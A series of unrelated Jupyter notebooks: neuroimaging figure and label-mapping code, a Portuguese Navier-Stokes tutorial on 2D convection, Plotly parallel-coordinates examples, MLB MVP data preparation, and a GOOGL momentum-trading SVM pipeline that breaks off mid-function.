sns.barplot(x='ROI', y='RT_diff', hue='Analysis', data=corr,
order=xlabels, ax=ax)
ax.hlines(0,-0.5,len(xlabels)+0.5)
ax.legend(loc=7, bbox_to_anchor=(1.3,0.5), fontsize=16, handletextpad=0.2)
ax.set(xlabel='', ylabel="Pearson's $r$", title='DBS x RT Correlation')
ax.set_xticklabels(xlabels, fontsize=16, rotation=-30)
sns.despine()
plt.subplots_adjust(left=0.12, right=0.8, top=0.85, bottom=0.17)
plt.savefig('plots/manuscript/supplementary/S8.png', dpi=180)
plt.savefig('plots/manuscript/supplementary/S8.svg', dpi=180)
```
### S9: Lausanne Mapping
#### Plot Labels
```
import os
from surfer import Brain
from pandas import read_csv
%matplotlib qt4
## Initialize brain.
brain = Brain('fscopy', 'split', 'inflated', views = ['lateral','medial'],
size = (1200,800), subjects_dir='../freesurfs')
## Load mapping info.
mapping = read_csv('../freesurfs/fscopy/label/april2016/mapping.csv')
emote_label = ''
for _, row in mapping.iterrows():
## Load EMOTE label.
if not row['EMOTE Label'] == emote_label:
emote_label = row['EMOTE Label']
brain.add_label('../freesurfs/fscopy/label/april2016/%s.label' %emote_label,
hemi='lh' if emote_label.endswith('lh') else 'rh',
borders = True, color = row['Color'])
```
#### Find number of vertices
```
import os
import numpy as np
from mne import read_label, read_source_spaces
from pandas import read_csv
## Load mapping info.
label_dir = '../freesurfs/fscopy/label/april2016'
mapping = read_csv('%s/mapping.csv' %label_dir)
## Load source space.
src = read_source_spaces('../freesurfs/fscopy/bem/fscopy-oct-6p-src.fif', verbose=False)
## Locate labels.
labels = [f for f in os.listdir(label_dir) if f.endswith('label')]
## Iteratively identify number of labels in source space.
mapping['Vertices'] = 0
for label in labels:
## Load label.
label = read_label('%s/%s' %(label_dir,label))
## Compute number of vertices in source space.
n_vert = np.in1d(src[0 if label.hemi == 'lh' else 1]['vertno'], label.vertices).sum()
## Store in DataFrame.
mapping.loc[mapping['EMOTE Label']==label.name, 'Vertices'] = n_vert
mapping.to_csv('%s/mapping.csv' %label_dir, index=False)
```
| github_jupyter |
> Texto fornecido sob a Creative Commons Attribution license, CC-BY. Todo o código está disponível sob a FSF-approved BSD-3 license.<br>
> (c) Original por Lorena A. Barba, Gilbert F. Forsyth em 2017, traduzido por Felipe N. Schuch em 2020.<br>
> [@LorenaABarba](https://twitter.com/LorenaABarba) - [@fschuch](https://twitter.com/fschuch)
12 passos para Navier-Stokes
======
***
Até agora, todo nosso trabalho tem sido em uma dimensão espacial (Passos [1](./01_Passo_1.ipynb) ao [4](./05_Passo_4.ipynb)). Podemos aprender muito apenas em 1D, mas vamos partir para as _planícies_: duas dimensões.
Nos exercícios à seguir, vamos estender os primeiros quatro passos para 2D. Para expandir as fórmulas 1D de diferenças finitas para diferenciais parciais em 2D ou 3D, apenas aplique a definição: a derivada parcial com respeito a $x$ é a variação na direção $x$ com $y$ *constante*.
No espaço 2D, uma malha retangular (uniforme) é definida por pontos com coordenadas:
$$x_i = x_0 +i \Delta x$$
$$y_j = y_0 +j \Delta y$$
Agora, definimos $u_{i,j} = u(x_i,y_j)$ e aplicamos os esquemas de diferenças finitas em cada variável $x,y$ *agindo separadamente* nos índices $i$ e $j$. Todas as derivadas são beseadas na expansão de Taylor 2D no ponto da malha ao redor de $u_{i,j}$.
Assim, para a derivada espacial de primeira ordem na direção $x$, a fórmula de diferenças finitas é:
$$ \frac{\partial u}{\partial x}\biggr\rvert_{i,j} = \frac{u_{i+1,j}-u_{i,j}}{\Delta x}+\mathcal{O}(\Delta x)$$
e de maneira similar na direção $y$. Dessa maneira, podemos escrever os esquemas de diferenças para frente, diferenças para trás ou diferenças centradas dos Passos 5 ao 12. Vamos começar!
Passo 5: Convecção Linear 2D
----
***
A EDP que governa a convecção linear 2D é escrita como
$$\frac{\partial u(x,y)}{\partial t}+c\frac{\partial u(x,y)}{\partial x} + c\frac{\partial u(x,y)}{\partial y} = 0$$
Essa é exatamente a mesma forma vista na equação linear 1D, exceto que agora tem duas dimensões espaciais para se levar em conta quando avançamos no tempo.
Novamente, o passo de tempo será discretizado com diferença para frente, enquando ambas coordenadas espaciais serão discretizadas com esquemas de diferença para trás.
Na implementação 1D, usamos o subscrito $i$ para representar o movimento no espaço (por exemplo, $u_{i}^n-u_{i-1}^n$). Agora que temos que considerar duas dimensões, vamos precisar adicionar um segundo subscrito, $j$, para considerar toda a informação do problema.
Aqui, vamos usar $i$ novamente como índice para nossos valores em $x$, e vamos adicionar o índice $j$ para marcar valores em $y$.
Com isso em mente, a discretização da nossa EDP pode ser bastante direta
$$\frac{u_{i,j}^{n+1}-u_{i,j}^n}{\Delta t} + c\frac{u_{i, j}^n-u_{i-1,j}^n}{\Delta x} + c\frac{u_{i,j}^n-u_{i,j-1}^n}{\Delta y}=0.$$
Como antes, isolamos a incógnita
$$u_{i,j}^{n+1} = u_{i,j}^n-c \frac{\Delta t}{\Delta x}(u_{i,j}^n-u_{i-1,j}^n)-c \frac{\Delta t}{\Delta y}(u_{i,j}^n-u_{i,j-1}^n)$$
Vamos resolver a equação com a seguinte condição inicial (CI):
$$u(x,y) = \begin{cases}
\begin{matrix}
2 & \text{ se } 0,5 \leq x, y \leq 1 \cr
1 & \text{senão}\end{matrix}\end{cases}$$
e as condições de contorno:
$$u = 1\ \text{para } \begin{cases}
\begin{matrix}
x = 0,\ 2 \cr
y = 0,\ 2 \end{matrix}\end{cases}$$
```
## Nova biblioteca necessária para gráficos em projeções 3D
from mpl_toolkits.mplot3d import Axes3D
import numpy
from matplotlib import pyplot, cm
%matplotlib inline
###Declaração das variáveis
nx = 81
ny = 81
nt = 100
c = 1
dx = 2 / (nx - 1)
dy = 2 / (ny - 1)
sigma = .2
dt = sigma * dx
x = numpy.linspace(0, 2, nx)
y = numpy.linspace(0, 2, ny)
u = numpy.ones((nx, ny)) ##Cria um vetor ny x nx com 1
un = numpy.ones((nx, ny)) ##
###Assinala a condição Inicial
##CI função chapéu : u(0,5<=x<=1 && 0,5<=y<=1 ) is 2
u[int(.5 / dx):int(1 / dx + 1),int(.5 / dy):int(1 / dy + 1)] = 2
###Gráfica da Condição Inicial
##the figsize parameter can be used to produce different sized images
fig = pyplot.figure(figsize=(11, 7), dpi=100)
ax = fig.gca(projection='3d')
X, Y = numpy.meshgrid(x, y)
surf = ax.plot_surface(X, Y, u[:].T, cmap=cm.viridis)
```
### Notas sobre o Gráfico 3D
Para produzir a projeção 3D dos resultados, tenha certeza de que tenha adicionado a biblioteca Axes3D.
```python
from mpl_toolkits.mplot3d import Axes3D
```
O comando gráfico atual envolve alguns comandos a mais que uma simples curva 2D.
```python
fig = pyplot.figure(figsize=(11, 7), dpi=100)
ax = fig.gca(projection='3d')
surf2 = ax.plot_surface(X, Y, u[:].T)
```
A primeira linha aqui é a inicialização da janela da figura. Os comandos **figsize** e **dpi** são opcionais, e simplesmente especificam o tamanho e resolução da figura sendo criada. Eles podem ser omitidos, mas você ainda vai precisar do
```python
fig = pyplot.figure()
```
As linhas seguintes assinalam a janela gráfica para a etiqueta 'ax' e também especificam que ela será uma projeção 3D. A última linha usa o comando
```python
plot_surface()
```
que é equivalente ao comando plot padrão, mas ele recebe os valores da malha X e Y para os valores da posição dos pontos.
##### Nota
Os valores `X` e `Y` que são passados como argumento para `plot_surface` não são os mesmos vetores 1D `x` e `y`. Para usar as funções gráficas Matplotlib 3D, você precisa gerar uma malha de `x, y` valores que correspondem a cada coordenada na estrutura do gráfico. Essas coordenadas são produzidas usando a função numpy `meshgrid`.
```python
X, Y = numpy.meshgrid(x, y)
```
Observe que, por definição, a biblioteca funciona com os índices opostos a nossa definição $i, j$. Então informamos como argumento a transposta da nossa função, isto é, `u[:].T`.
### Iterando em duas dimensões
A avaliação da onda em duas dimensões demanda o uso de diversos laços `for` aninhados para cobrir todos $i, j, n$. Uma vez que Python é uma linguagem interpretada (não compilada), pode-se notar considerável lentidão na execução de múltiplos laços `for`. Primeiro, vamos verificar o código da convecção 2D e ver os resultados produzidos.
```
## Re-apply the hat-function initial condition.
u = numpy.ones((nx, ny))
u[int(.5 / dx):int(1 / dx + 1), int(.5 / dy):int(1 / dy + 1)] = 2
for n in range(nt + 1):  ## loop across number of time steps
    un = u.copy()
    row, col = u.shape
    ## Backward-difference update in both spatial directions, written
    ## deliberately with nested Python loops for comparison with the
    ## vectorized version.
    for i in range(1, row):
        for j in range(1, col):
            u[i, j] = (un[i, j] - (c * dt / dx * (un[i, j] - un[i-1, j])) -
                       (c * dt / dy * (un[i, j] - un[i, j-1])))
    ## Enforce u = 1 boundary conditions on all four edges.
    u[0, :] = 1
    u[-1, :] = 1
    u[:, 0] = 1
    u[:, -1] = 1
fig = pyplot.figure(figsize=(11, 7), dpi=100)
## Figure.gca(projection='3d') was removed in Matplotlib 3.7.
ax = fig.add_subplot(projection='3d')
surf2 = ax.plot_surface(X, Y, u[:].T, cmap=cm.viridis)
```
Operações de Arranjos
----------------
Aqui o mesmo código de convecção 2D é implementado, mas em vez de usar laços `for` aninhados, o mesmo cálculo é avaliado usando operações de arranjos.
```
## Re-apply the hat-function initial condition.
u = numpy.ones((nx, ny))
u[int(.5 / dx):int(1 / dx + 1), int(.5 / dy):int(1 / dy + 1)] = 2
for n in range(nt + 1):  ## time loop
    un = u.copy()
    ## Vectorized backward-difference update: equivalent to the nested
    ## loops above, but evaluated as whole-array operations.
    u[1:, 1:] = (un[1:, 1:] - (c * dt / dx * (un[1:, 1:] - un[:-1, 1:])) -
                 (c * dt / dy * (un[1:, 1:] - un[1:, :-1])))
    ## Enforce u = 1 boundary conditions on all four edges.
    u[0, :] = 1
    u[-1, :] = 1
    u[:, 0] = 1
    u[:, -1] = 1
fig = pyplot.figure(figsize=(11, 7), dpi=100)
## Figure.gca(projection='3d') was removed in Matplotlib 3.7.
ax = fig.add_subplot(projection='3d')
surf2 = ax.plot_surface(X, Y, u[:].T, cmap=cm.viridis)
```
Material Complementar
-----
***
A lição em vídeo que cobre os detalhes para o Passo 5 (e adiante até o Passo 8) é **_Video Lesson 6_** no YouTube:
```
from IPython.display import YouTubeVideo
YouTubeVideo('tUg_dE3NXoY')
from IPython.core.display import HTML
def css_styling():
    """Load the notebook's custom CSS file and return it as an HTML object.

    Returns:
        HTML: the stylesheet contents wrapped for notebook display.
    """
    # Use a context manager so the file handle is closed promptly; the
    # original left the handle returned by open() unclosed.
    with open("../styles/custom.css", "r") as css_file:
        styles = css_file.read()
    return HTML(styles)
```
> A célula acima executa o estilo para esse notebook. Nós modificamos o estilo encontrado no GitHub de [CamDavidsonPilon](https://github.com/CamDavidsonPilon), [@Cmrn_DP](https://twitter.com/cmrn_dp).
| github_jupyter |
#### New to Plotly?
Plotly's Python library is free and open source! [Get started](https://plot.ly/python/getting-started/) by downloading the client and [reading the primer](https://plot.ly/python/getting-started/).
<br>You can set up Plotly to work in [online](https://plot.ly/python/getting-started/#initialization-for-online-plotting) or [offline](https://plot.ly/python/getting-started/#initialization-for-offline-plotting) mode, or in [jupyter notebooks](https://plot.ly/python/getting-started/#start-plotting-online).
<br>We also have a quick-reference [cheatsheet](https://images.plot.ly/plotly-documentation/images/python_cheat_sheet.pdf) (new!) to help you get started!
#### Version Check
Note: Parallel Coordinates Plots are available in version <b>2.0.6+</b><br>
Run `pip install plotly --upgrade` to update your Plotly version.
```
import plotly
plotly.__version__
```
### Basic Parallel Coordinates Plot
```
import plotly.plotly as py
import plotly.graph_objs as go
import pandas as pd
# Iris measurements with a numeric species id per row.
df = pd.read_csv("https://raw.githubusercontent.com/bcdunbar/datasets/master/iris.csv")

# One Parcoords trace: each data row becomes a polyline crossing the four
# dimension axes; line colour encodes the species id.
data = [
    go.Parcoords(
        line = dict(color = df['species_id'],
                    colorscale = [[0,'#D7C16B'],[0.5,'#23D8C3'],[1,'#F3F10F']]),
        dimensions = list([
            dict(range = [0,8],
                 constraintrange = [4,8],  # start with Sepal Length pre-filtered to [4, 8]
                 label = 'Sepal Length', values = df['sepal_length']),
            dict(range = [0,8],
                 label = 'Sepal Width', values = df['sepal_width']),
            dict(range = [0,8],
                 label = 'Petal Length', values = df['petal_length']),
            dict(range = [0,8],
                 label = 'Petal Width', values = df['petal_width'])
        ])
    )
]

layout = go.Layout(
    plot_bgcolor = '#E5E5E5',
    paper_bgcolor = '#E5E5E5'
)

fig = go.Figure(data = data, layout = layout)
py.iplot(fig, filename = 'parcoords-basic')  # publishes the chart online
```
Parallel coordinates are richly interactive by default. Drag the lines along the axes to filter regions and drag the axis names across the plot to rearrange variables:

### Advanced Parallel Coordinates Plot
```
import plotly.plotly as py
import plotly.graph_objs as go
import pandas as pd
df = pd.read_csv("https://raw.githubusercontent.com/bcdunbar/datasets/master/parcoords_data.csv")

data = [
    go.Parcoords(
        # Colour lines by 'colorVal' with a visible, reversed Jet colourbar
        # clamped to [-4000, -100].
        line = dict(color = df['colorVal'],
                    colorscale = 'Jet',
                    showscale = True,
                    reversescale = True,
                    cmin = -4000,
                    cmax = -100),
        dimensions = list([
            dict(range = [32000,227900],
                 constraintrange = [100000,150000],  # initial filter on this axis
                 label = 'Block Height', values = df['blockHeight']),
            dict(range = [0,700000],
                 label = 'Block Width', values = df['blockWidth']),
            # Categorical axis: tick values mapped to category names.
            # NOTE(review): 'Cyclinder' looks like a typo for 'Cylinder' in a
            # user-visible label -- confirm before changing the published chart.
            dict(tickvals = [0,0.5,1,2,3],
                 ticktext = ['A','AB','B','Y','Z'],
                 label = 'Cyclinder Material', values = df['cycMaterial']),
            dict(range = [-1,4],
                 tickvals = [0,1,2,3],
                 label = 'Block Material', values = df['blockMaterial']),
            dict(range = [134,3154],
                 visible = True,
                 label = 'Total Weight', values = df['totalWeight']),
            dict(range = [9,19984],
                 label = 'Assembly Penalty Weight', values = df['assemblyPW']),
            dict(range = [49000,568000],
                 label = 'Height st Width', values = df['HstW']),
            dict(range = [-28000,196430],
                 label = 'Min Height Width', values = df['minHW']),
            dict(range = [98453,501789],
                 label = 'Min Width Diameter', values = df['minWD']),
            dict(range = [1417,107154],
                 label = 'RF Block', values = df['rfBlock'])
        ])
    )
]

py.iplot(data, filename = 'parcoords-advanced')
```
#### Reference
See https://plot.ly/python/reference/#parcoords for more information and chart attribute options!
```
from IPython.display import display, HTML
# Inject the documentation site's fonts and stylesheet into the notebook.
display(HTML('<link href="//fonts.googleapis.com/css?family=Open+Sans:600,400,300,200|Inconsolata|Ubuntu+Mono:400,700" rel="stylesheet" type="text/css" />'))
display(HTML('<link rel="stylesheet" type="text/css" href="http://help.plot.ly/documentation/all_static/css/ipython-notebook-custom.css">'))

#! pip install git+https://github.com/plotly/publisher.git --upgrade
import publisher
# Publish this notebook to the plotly documentation site.
# NOTE(review): 'coorindates' is a typo for 'coordinates' in the published
# description string below -- fix deliberately, since it is user-visible text.
publisher.publish(
    'parcoords.ipynb', 'pandas/parallel-coordinates-plot/', 'Parallel Coordinates Plot | plotly',
    'How to make parallel coorindates plots with Pandas and Plotly.',
    title = 'Parallel Coordinates Plot | plotly',
    name = 'Parallel Coordinates Plot',
    has_thumbnail='true', thumbnail='thumbnail/parcoords.jpg',
    language='pandas',
    page_type='example_index',
    display_as='scientific', order=11)
```
| github_jupyter |
```
# Dependencies
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import math
import os
import sklearn
import sklearn.datasets
from sklearn.datasets import make_regression
from sklearn.ensemble import GradientBoostingClassifier
np.set_printoptions(threshold=np.inf)
# read in data
batting = pd.read_csv("Fangraphs Leaderboard.csv")
awards = pd.read_csv("AwardsPlayers.csv")
master = pd.read_csv("Master.csv", encoding='latin-1')  # file is not UTF-8
team = pd.read_csv("teamResults.csv")
teamNames = pd.read_csv("Teams.csv")

# calculate win percentage for each team
teamNames['Win_percent'] = teamNames['W'] / (teamNames['W'] + teamNames['L'])
# Rename 'name' to 'Team' so this frame can be merged on a common key later.
teamNames.rename(columns = {'name': 'Team'}, inplace = True)
teamNames.tail()
# lots of data manipulation and cleaning was necessary to get all these datasets into the proper form for merging
# Collapse full franchise names down to bare nicknames so 'Team' can be used
# as a merge key with the other tables. A single dict-based replace performs
# the same regex/substring substitutions as the original chain of 31
# DataFrame-wide .replace() calls, in one pass over the frame.
full_name_to_nickname = {
    "Houston Astros": "Astros",
    "Oakland Athletics": "Athletics",
    "Los Angeles Angels of Anaheim": "Angels",
    "Texas Rangers": "Rangers",
    "Seattle Mariners": "Mariners",
    "Colorado Rockies": "Rockies",
    "San Francisco Giants": "Giants",
    "San Diego Padres": "Padres",
    "Los Angeles Dodgers": "Dodgers",
    "Arizona Diamondbacks": "Diamondbacks",
    "Cleveland Indians": "Indians",
    "Kansas City Royals": "Royals",
    "Minnesota Twins": "Twins",
    "Detroit Tigers": "Tigers",
    "Chicago White Sox": "White Sox",
    "Chicago Cubs": "Cubs",
    "Milwaukee Brewers": "Brewers",
    "Cincinnati Reds": "Reds",
    "Pittsburgh Pirates": "Pirates",
    "St. Louis Cardinals": "Cardinals",
    "New York Yankees": "Yankees",
    "Boston Red Sox": "Red Sox",
    "Toronto Blue Jays": "Blue Jays",
    "Baltimore Orioles": "Orioles",
    "Tampa Bay Rays": "Rays",
    "New York Mets": "Mets",
    "Philadelphia Phillies": "Phillies",
    "Miami Marlins": "Marlins",
    "Atlanta Braves": "Braves",
    "Washington Nationals": "Nationals",
    "Montreal Expos": "Expos",
}
teamNames = teamNames.replace(full_name_to_nickname, regex=True)
teamNames
# more data cleaning using various pandas functions
# Drop biographical columns that are not needed for modelling.
master.drop(['birthYear', 'birthMonth', 'birthDay','birthCountry', 'birthState','birthCity','deathYear','deathMonth','deathDay','deathCountry','deathState','deathCity', 'debut','finalGame','retroID','bbrefID'], axis=1, inplace=True)
# Keep only MVP award rows and attach player names from the master table.
awardsMVP = awards.loc[awards['awardID'] == "Most Valuable Player"]
data1 = pd.merge(awardsMVP, master, on= ['playerID'], how = 'left')
data1 = data1.loc[data1['yearID'] > 1997 ]  # restrict to the 1998+ seasons
data1['Name'] = data1['nameFirst'] + ' ' + data1['nameLast']
batting.rename(columns = {'Season': 'yearID'}, inplace = True)
data1.drop(['tie', 'notes'], axis=1, inplace=True)
# Left-join batting stats with award info on player name + season.
data = pd.merge(batting, data1, on= ['Name', 'yearID'], how = 'left')
data.drop(['nameFirst', 'nameLast', 'nameGiven'], axis=1, inplace=True)
# Encode leagues as strings: AL -> "0", NL -> "1" (substring replace).
data = data.replace("AL", "0", regex = True)
data = data.replace("NL", "1", regex = True)
data.to_csv('dataNames.csv')
data
# more data cleaning
# Map three-letter franchise codes to nicknames in a single dict-based pass
# (same regex/substring semantics as the original 32 chained .replace() calls;
# note both TBD and TBR map to Rays).
code_to_nickname = {
    "HOU": "Astros",
    "OAK": "Athletics",
    "LAA": "Angels",
    "TEX": "Rangers",
    "SEA": "Mariners",
    "COL": "Rockies",
    "SFG": "Giants",
    "SDP": "Padres",
    "LAD": "Dodgers",
    "ARI": "Diamondbacks",
    "CLE": "Indians",
    "KCR": "Royals",
    "MIN": "Twins",
    "DET": "Tigers",
    "CWS": "White Sox",
    "CHC": "Cubs",
    "MIL": "Brewers",
    "CIN": "Reds",
    "PIT": "Pirates",
    "STL": "Cardinals",
    "NYY": "Yankees",
    "BOS": "Red Sox",
    "TOR": "Blue Jays",
    "BAL": "Orioles",
    "TBD": "Rays",
    "TBR": "Rays",
    "NYM": "Mets",
    "PHI": "Phillies",
    "MIA": "Marlins",
    "ATL": "Braves",
    "WSN": "Nationals",
    "MON": "Expos",
}
team = team.replace(code_to_nickname, regex=True)
team = team.drop(team.index[0])  # drop the first row (assumed junk/header row -- confirm)
team.rename(columns = {'league': 'lgID', 'team': 'Team'}, inplace = True)
# Encode leagues as strings "0"/"1", matching the other tables.
team = team.replace("AL", "0", regex = True)
team = team.replace("NL", "1", regex = True)
team
# creating the dummy variable for MVP, this will be the dependent variable in the model
data['MVP'] = data['awardID']
# .copy() so the MVP_dummy assignments below write to independent frames
# rather than views of `data` (the original raised SettingWithCopyWarning
# and risked silently lost writes).
dummies = data.loc[data['MVP'] == 'Most Valuable Player'].copy()
non_dummies = data.loc[data['MVP'] != 'Most Valuable Player'].copy()
dummies['MVP_dummy'] = 1
non_dummies['MVP_dummy'] = 0
# pd.concat replaces the deprecated DataFrame.append; row order is identical
# (MVP rows first, then the rest).
data_dummies = pd.concat([dummies, non_dummies])
df = data_dummies.sort_values(by = ['yearID'])
df1 = data_dummies.sort_values(by = ['yearID'])
# Slim identifier frame used later to merge names/teams back onto winners.
df1 = pd.DataFrame({"Name": df1['Name'], "playerid": df1['playerid'], "yearID": df1['yearID'], "Team": df1['Team']})
df1.head()
# merging of data to create dataframe that will be used to merge names with award winners (string columns can't be used
# in model)
df1 = pd.merge(df1, teamNames, on = ['Team', 'yearID'], how='inner')
df1 = pd.merge(df1, team, on = ['Team'], how='inner')
print(df1)
# Keep only the identifier columns plus team win% and league id.
df1 = pd.DataFrame({'Name': df1['Name'], 'Team': df1['Team'], 'playerid': df1['playerid'], 'yearID': df1['yearID'], 'Win_percent': df1['Win_percent'], 'lgID': df1['lgID_y']})
df1
# Drop string/unused columns that cannot be fed to the model.
df.drop(['playerID','awardID', 'weight', 'height', 'bats', 'throws', 'MVP', 'BB%', 'K%', 'Name'], axis = 1, inplace = True )

# more merging
# Hold out the 2018 season as the prediction (test) set before merging.
df_2018 = df.loc[df['yearID'] == 2018]
print(df_2018)
df = pd.merge(df, df1, on = ['playerid', 'yearID', 'Team'], how = 'inner')
df.drop(['Name', 'Team', 'lgID_x'], axis=1, inplace=True)
df.head()

# merging for test data
df_2018 = pd.merge(df_2018, team, on=['Team'], how='left')
df_2018.drop(['lgID_x', 'Team'], axis=1, inplace=True)
df_2018 = df_2018.fillna(0)
df_2018
# creating ranking system for each stat. This is necessary for the model to run and create predictions properly
# Each statistic is replaced by the player's rank within his (season, league)
# group, best value = rank 1. A loop over the column list replaces 17
# copy-pasted groupby/rank lines with identical behaviour.
rank_cols = ['G', 'PA', 'HR', 'R', 'RBI', 'SB', 'ISO', 'BABIP', 'AVG', 'OBP',
             'SLG', 'wOBA', 'wRC+', 'BsR', 'Off', 'Def', 'WAR']
for col in rank_cols:
    df[col] = df.groupby(['yearID', 'lgID_y'])[col].rank(ascending=False)
print(df.tail())
# ranking 2018 testing data same way as above
# Same within-(season, league) ranking applied to the 2018 hold-out frame.
rank_cols_2018 = ['G', 'PA', 'HR', 'R', 'RBI', 'SB', 'ISO', 'BABIP', 'AVG', 'OBP',
                  'SLG', 'wOBA', 'wRC+', 'BsR', 'Off', 'Def', 'WAR']
for col in rank_cols_2018:
    df_2018[col] = df_2018.groupby(['yearID', 'lgID_y'])[col].rank(ascending=False)
df_2018
# saving data to use for the predictions notebook. Switch to Machine_Learning_Predictions for the findings
df.to_csv("training_data.csv")
df_2018.to_csv("testing_data.csv")
```
| github_jupyter |
# Momentum Trading
```
import time_series_transform as tst
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
from time_series_transform.transform_core_api.util import *
from time_series_transform.stock_transform.util import *
tickList = [
'GOOGL'
]
pe = tst.Portfolio_Extractor(tickList,'yahoo')
port = pe.get_portfolio_date('2010-06-24','2020-07-30')
port.remove_different_date()
def rolling_std(arr, windowSize):
    """Rolling sample standard deviation of *arr* over a window.

    The first windowSize - 1 entries are NaN, matching pandas' rolling
    semantics. Returns a numpy array of the same length as *arr*.
    """
    return pd.Series(arr).rolling(windowSize).std().values
labels = []
colList = ['Open', 'High', 'Low', 'Close']
for c in colList:
    # Derived per-column indicators: wavelet-denoised series, geometric
    # moving averages (150 / 10) and rolling standard deviations (10 / 50).
    port.make_technical_indicator(c,f'{c}_wavelet',wavelet_denoising,wavelet = 'haar')
    port.make_technical_indicator(c,f'{c}_gma150',geometric_ma,windowSize = 150)
    port.make_technical_indicator(c,f'{c}_gma10',geometric_ma,windowSize = 10)
    port.make_technical_indicator(c,f'{c}_std10',rolling_std,windowSize = 10)
    port.make_technical_indicator(c,f'{c}_std50',rolling_std,windowSize = 50)
    for t in tickList:
        # NOTE(review): several label names here (gma50, william, so) do not
        # match the indicators created above (gma150; william/so are made only
        # for Close below), and `labels` is not visibly used afterwards --
        # confirm before relying on this list.
        labels.extend([
            f'{t}_{c}',
            f'{t}_{c}_wavelet',
            f'{t}_{c}_gma50',
            f'{t}_{c}_gma10',
            f'{t}_{c}_william',
            f'{t}_{c}_std10',
            f'{t}_{c}_std50',
            f'{t}_{c}_so',
        ])
# port.make_technical_indicator('Close',f'william',williams_r)
port.make_technical_indicator('Close',f'macd',macd,return_diff=True)
port.make_technical_indicator('Close',f'so',stochastic_oscillator)
df = port.get_portfolio_dataFrame()
# Pivot to a wide panel (one row per date, columns suffixed by symbol),
# add a 30-step sliding window and a 1-step-ahead ("lead") close column.
ptspd = tst.Pandas_Time_Series_Panel_Dataset(df)
ptspd =ptspd.expand_dataFrame_by_category('Date','symbol')
ptspd = ptspd.make_slide_window('Date',30).make_lead_column('Date','Close_GOOGL',1)
df = ptspd.df
df = df.drop(['Dividends_GOOGL','Stock Splits_GOOGL'],axis =1)
df=df.sort_values('Date')
# tr: where today's close sits in [min, max] of {today, tomorrow}. Because of
# the min/max construction this is 1 when tomorrow's close is LOWER than
# today's and 0 when it is higher -- i.e. the opposite sign to `momentum`.
df['trmin'] = df[["Close_GOOGL_lead1","Close_GOOGL"]].min(axis =1)
df['trmax'] = df[["Close_GOOGL_lead1","Close_GOOGL"]].max(axis =1)
df['tr'] = (df["Close_GOOGL"] - df["trmin"])/(df['trmax'] - df['trmin'])
# momentum: 1 when tomorrow's close is above today's, else 0.
df["momentum"] = df["Close_GOOGL_lead1"] - df["Close_GOOGL"]
df["momentum"] = df["momentum"].apply(lambda x: 1 if x > 0 else 0)
df = df.dropna()
df['tr'] = df.tr.apply(lambda x: 1 if x > 0.5 else 0)
df.tr.value_counts()
# Chronological train/test split -- no shuffling for time-series data.
train = df[df.Date <= '2020-06-30'].sort_values('Date')
test = df[df.Date > '2020-06-30'].sort_values('Date')
trainX = train.drop(['Date','Close_GOOGL_lead1','momentum','tr','trmin','trmax'],axis = 1)
trainY = train["tr"]
testX = test.drop(['Date','Close_GOOGL_lead1','momentum','tr','trmin','trmax'],axis = 1)
testY = test["tr"]
```
# Machine Learning
```
from sklearn.ensemble import RandomForestRegressor,RandomForestClassifier
from sklearn.tree import DecisionTreeRegressor,DecisionTreeClassifier
from sklearn.svm import SVR,SVC
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler,MinMaxScaler,Normalizer
from sklearn.pipeline import Pipeline
from sklearn.metrics import mean_squared_error,confusion_matrix
from sklearn.model_selection import TimeSeriesSplit,RandomizedSearchCV
from scipy.stats import uniform
# Pipeline: standardise -> PCA -> polynomial-kernel SVM. The C/degree/
# n_components values set here are only defaults; the randomised search
# below overrides them.
pip = Pipeline([
    ('std',StandardScaler()),
    ('pca',PCA(10,whiten = False)),
    ('svm',SVC(C = 0.5,kernel = 'poly',degree = 3))
])
hparam = {
    'pca__n_components':np.arange(2,50,dtype='int'),
    'svm__C':uniform(loc=2, scale=6),  # C sampled uniformly from [2, 8]
    'svm__degree':np.arange(4,10,dtype='int'),
}
# Third positional argument is n_iter = 30 random parameter draws; CV uses
# time-ordered splits so training folds never see future data.
ranCV = RandomizedSearchCV(pip,hparam,
                30,
                scoring = 'f1',
                cv = TimeSeriesSplit(2),
                n_jobs = -1,
                verbose = 50)
ranCV.fit(trainX,trainY)
print(confusion_matrix(testY,ranCV.predict(testX)))
prd = pd.DataFrame(ranCV.predict(testX),columns = ['prd'])
def make_momentum(predList):
    """Convert predicted `tr` values into momentum labels.

    Predictions above 0.5 map to 0 and everything else to 1; the inversion
    mirrors the opposite sign convention between `tr` and `momentum` used
    when the labels were built.
    """
    return [0 if pred > 0.5 else 1 for pred in predList]
# prd['momentum']=make_momentum(testY.tolist())
# Invert the tr predictions into momentum labels (see make_momentum).
prd['momentum']=make_momentum(prd.prd.tolist())
prd.prd.plot()
# Attach the true labels, dates and close prices for the test period.
prd['actual_momentum'] = df[df.Date > '2020-06-30'].momentum.values
prd['Date'] = df[df.Date > '2020-06-30'].Date.values
prd['Close'] = testX['Close_GOOGL'].values
prd = prd.sort_values('Date')
def make_signale(momentumList):
    """Turn 0/1 momentum labels into 'buy'/'sell'/'hold' trade signals.

    momentum 1 means buy, 0 means sell. Consecutive identical intents
    collapse to 'hold', and a leading sell (nothing to sell yet) also
    becomes 'hold'.
    """
    signal = []
    previous = None
    for momentum in momentumList:
        intent = 'buy' if momentum == 1 else 'sell'
        if not signal:
            # First bar: can't sell before owning anything.
            signal.append('hold' if intent == 'sell' else intent)
        elif intent == previous:
            signal.append('hold')
        else:
            signal.append(intent)
        previous = intent
    return signal
prd['signal'] = make_signale(prd.momentum.tolist())
# Plot the close price and mark buy ('x') / sell ('o') points from the signals.
plt.figure(figsize=(15,10))
plt.plot(prd.Close.values)
for ix,v in enumerate(prd[['Close','signal']].values):
    if v[1] == 'buy':
        buy = plt.plot(ix,v[0],'x',label = 'buy')
    elif v[1] == 'sell':
        plt.plot(ix,v[0],'o',label='sell')
plt.legend(('Close','buy','sell'))
plt.show()
def profit_eval(prdDf):
    """Return the fractional profit of executing the buy/sell signals.

    Sums the close prices of all buys and all sells (a trailing unmatched
    buy is ignored) and returns (sell - buy) / buy.

    BUG FIX: the original filtered on the *global* ``prd`` frame instead of
    the ``prdDf`` argument, so evaluating any other frame silently used the
    wrong data (or raised NameError).
    """
    trades = prdDf[prdDf.signal != 'hold'].sort_values('Date')[['signal', 'Close']]
    trades = trades.to_records()  # records: (index, signal, Close)
    buy, sell = 0, 0
    for ix, row in enumerate(trades):
        # Skip a final unmatched buy -- the position was never closed.
